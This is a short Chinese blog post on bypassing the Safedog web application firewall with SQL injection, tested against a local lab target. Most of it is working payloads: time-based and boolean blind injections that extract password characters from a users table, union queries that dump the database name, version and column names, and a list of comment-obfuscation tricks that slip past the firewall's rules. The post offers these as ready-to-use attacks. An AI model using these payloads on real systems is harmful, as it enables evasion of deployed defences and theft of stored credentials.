过安全狗waf注入技巧


 过安全狗waf注入

前提web页面存在注入漏洞

测试开始本地搭建环境

环境  

安全狗(APACE版)V4.0 防护规则全开

绕过

1. 延时盲注

http://192.168.6.145/test.php?id=2' and if(substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1,sleep(5 ),1)–+

2. 布尔盲注

http://192.168.6.145/test.php?id=2' and substring((select password from (blog.users) where id=2 limit 1 offset 0),2,1)>1–+

3. 查库名/用户名

http://192.168.6.145/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,(/*!40000database*/()),3)– -

4. 查版本

http://192.168.6.145/test.php?id=2'union/*!40000DISTINCT*/(/*!40000select*/1,{/*!f*/version()},3)– -

5. 联合查询

http://192.168.6.145/test.php?id=-1'union /*!40000DISTINCT*/(/*!40000select*/1,(select group_concat(column_name) from (information_schema.columns) where table_name='users'),3)– -

技巧

1. union select 1,2,3 => union/*!40000DISTINCT*/(/*!40000select*/1,2,3)

2. select password from => select password*1.from user => select password from (user)

3. version() => {/*!f*/version()} 

发表评论 / Comment

用心评论~